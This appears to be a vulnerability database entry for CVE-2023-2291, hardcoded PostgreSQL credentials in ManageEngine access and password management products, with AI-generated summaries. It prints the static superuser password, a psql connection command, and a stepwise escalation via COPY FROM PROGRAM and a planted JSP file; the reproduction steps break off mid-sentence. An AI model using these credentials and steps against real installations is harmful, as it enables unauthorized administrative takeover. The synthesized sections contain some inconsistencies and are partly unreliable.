CVE-2023-2291
Description
Static credentials exist in the PostgreSQL data used in ManageEngine Access Manager Plus (AMP) build 4309, ManageEngine Password Manager Pro, and ManageEngine PAM360. These credentials could allow a malicious actor to modify configuration data that would escalate their permissions from that of a low-privileged user to an Administrative user.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Hardcoded PostgreSQL credentials in ManageEngine products allow low-privileged users to execute arbitrary SQL and escalate to admin.
Vulnerability
Hardcoded credentials exist in the PostgreSQL data used in ManageEngine Access Manager Plus (AMP) build 4309, ManageEngine Password Manager Pro, and ManageEngine PAM360 [1]. Specifically, the PostgreSQL database server uses a static password Stonebraker for the postgres superuser account, which is accessible from localhost [1]. This allows any local user to connect to the database and execute arbitrary SQL commands.
Exploitation
An attacker with low-privileged access to the local system can connect to the PostgreSQL database using the known credentials: psql -h 127.0.0.1 -p 4567 -d AMP -U postgres. From there, they can leverage the COPY ... FROM PROGRAM functionality to execute operating system commands as the SYSTEM account [1]. For example, they can create a table, copy the output of a command like whoami into it, and retrieve the result [1].
Impact
By executing arbitrary SQL and OS commands, the attacker can modify configuration data stored in the database, leading to privilege escalation from a low-privileged user to an Administrative user [1]. The SYSTEM account, while not a direct member of the Administrators group, can be used to alter administrative settings and grant full control over the application.
Mitigation
As of the publication date (2023-04-26), no official fix has been announced by Zoho [1]. Affected organizations should restrict network access to the PostgreSQL database port (default 4567) to only trusted hosts and ensure that only authorized personnel have local access to the server. Additionally, consider using firewall rules or application-level authentication to prevent unauthorized database connections.
AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
4- ManageEngine/Access Manager Plusdescription
- Range: =4309
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Hardcoded static PostgreSQL credentials ("Stonebraker") in ManageEngine AMP allow a low-privileged user to execute arbitrary commands as SYSTEM via the database's COPY FROM PROGRAM feature."
Attack vector
An attacker who already has low-privileged Windows user access to the AMP host can connect to the local PostgreSQL server using the hardcoded credentials (password "Stonebraker") [ref_id=1]. Using PostgreSQL's `COPY FROM PROGRAM` feature, the attacker can copy a malicious JSP file into the AMP webapp root, modify `security-common-onpremise.xml` to bypass the SecurityFilter, and modify `web.xml` to enable the JSP servlet [ref_id=1]. After restarting the AMP service via PostgreSQL, the attacker requests the uploaded JSP, which executes under the AMP service's administrative context and adds the low-privileged user to the local Administrators group [ref_id=1].
Affected code
The PostgreSQL database server bundled with ManageEngine AMP runs under the SYSTEM account and uses the hardcoded password "Stonebraker" for the postgres user [ref_id=1]. The AMP Windows service (Tomcat java.exe) runs with administrative privileges, and the PostgreSQL server can be used to modify AMP configuration files and the web application root [ref_id=1].
What the fix does
No vendor-supplied patch was available at the time of disclosure [ref_id=1]. The advisory recommends contacting ManageEngine support for mitigation assistance [ref_id=1]. A proper fix would involve removing hardcoded credentials from the PostgreSQL configuration, enforcing unique per-instance passwords, and restricting the PostgreSQL `COPY FROM PROGRAM` capability or running the database with reduced privileges.
Preconditions
- authAttacker must have low-privileged Windows user access (e.g., user1 in Users and Remote Desktop Users) to the AMP host
- networkThe local PostgreSQL server must be accessible on 127.0.0.1:4567 with the hardcoded password 'Stonebraker'
- configThe AMP Windows service must be running with administrative privileges
Reproduction
1. Create a low-privileged Windows user (e.g., user1 with membership in Users and Remote Desktop Users). 2. Create a JSP file (test.jsp) containing: `
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1News mentions
0No linked articles in our index yet.